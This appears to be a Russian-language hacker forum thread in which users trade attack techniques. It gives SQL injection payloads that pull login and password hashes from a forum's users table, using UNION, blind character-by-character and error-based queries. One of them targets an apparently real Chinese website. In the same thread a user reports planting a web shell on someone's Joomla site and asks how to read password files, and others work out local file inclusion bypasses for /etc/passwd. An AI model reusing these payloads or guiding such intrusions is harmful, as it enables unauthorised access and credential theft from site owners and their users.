test.ru/forum/viewtopic.php?id=1'+and+1=2+union+all+slelect+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+0,1+and+1='1 А вообще если у тебя есть login и password - зачем тебе хэш ??
BigBear Так нету пароля, известно только что поле есть password а там хэш пароля Запрос не работает к сожалению. Страница меняется Суть такая, проверял наличие таблиц, если такая есть => страница без изменений Нету => пропадают стили, скрипты В запросе пробелы где нужно убрал если что. А куда запрос должен был то вывестись? Скуля то слепая
Да, с slelect очепятался, бывает =) если блайнд то тут 2 вариант на выбор Code: test.ru/forum/viewtopic.php?id=1'+and+ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+[COLOR=Magenta]0[/COLOR],1),[COLOR=Magenta]1[/COLOR],1)>[COLOR=Magenta]50[/COLOR]+and+1='1 или Code: test.ru/forum/viewtopic.php?id=1+and+1=IF(ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+[COLOR=Magenta]0[/COLOR],1),[COLOR=Magenta]1[/COLOR],1)>[COLOR=Magenta]50[/COLOR],1,2)+and+1='1 Цветом выделены динамические переменные 1ая отвечает за номер записи в бд users_am (по дефолту идёт считывание данных из 1-ой записи) 2ая отвечает за порядок извлекаемого символа из строки id:login: password (по дефолту идёт извлечение первого символа) 3ья отвечает за код ascii символа в десятичном формате (Dec), по нему будешь ориентироваться, какой символ стоит на каком месте Если в процессе будешь получить НЕ ПУСТУЮ страницу - значит запрос получился верный. То есть в id:login: password на {1} строке таблицы users_am на позиции {2} находится ascii символ {3} Знаю, что сложнова-то для восприятия, но как мог так помог =)
нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by=1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?
http://lonyung.com.cn/buy.php?id=76 and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2)) x from nformation_schema.tables group by x)a)
google: "уязвимость HTTP Verb Tampering" сразу же первая ссылка с рассказом об этой уязвимости. P.S: Тоже почитаю)
залил shell на сайт joomla теперь вижу все файлы на сервере,подскажите пожалуйста как узнать под каким пользователем и с какими правами я там нахожусь? Некоторые папки и файлы не могу просматривать,такие как master.passwd и т.д,файл passwd просматривать могу.Извените за ламерский вопрос,новичёк.Спасибо.
PHP: include($_GET['file'] . '.html'); Почему то после первого обращения к include.php?file=../../../../../../../etc/passwd%00 вылетает ошибка: Code: Warning: include(): Failed opening '../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/include.php on line 2 А после последующих: Code: Warning: include(../../../../../../../etc/[COLOR=Red][B]passwd.html[/B][/COLOR]): failed to open stream: No such file or directory in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/include.php on line 2 То есть нулл-байт не обрезает расширение. Приходится чистить кэш или перезапускать браузер. magic_quotes_gpc = off.
попробуй вместо нулл байта 4096 слешей ../../../../../../../etc/passwd/////////////////////////////...
Только хотел про это написать) Подставил вместо нулл-байта 2500 повторений /. Получилась такая строка ../../../../../../../etc/passwd/./././.[...]/./. В таком случае все время ошибка: Code: Warning: include(../../../../../../../etc/passwd/././././.[...]/././././././. in /var/www/include.php on line 2 Warning: include(): Failed opening '../../../../../../../etc/passwd/./././././././.[...]/./././././. in /var/www/include.php on line 2 P.S. просто 4096 слэшей не будут работать, т.к. php обрабатывает их не так, как /. . /. удаляется полностью, а // меняются на /, в итоге в конце получим путь не к файлу, а к директории.
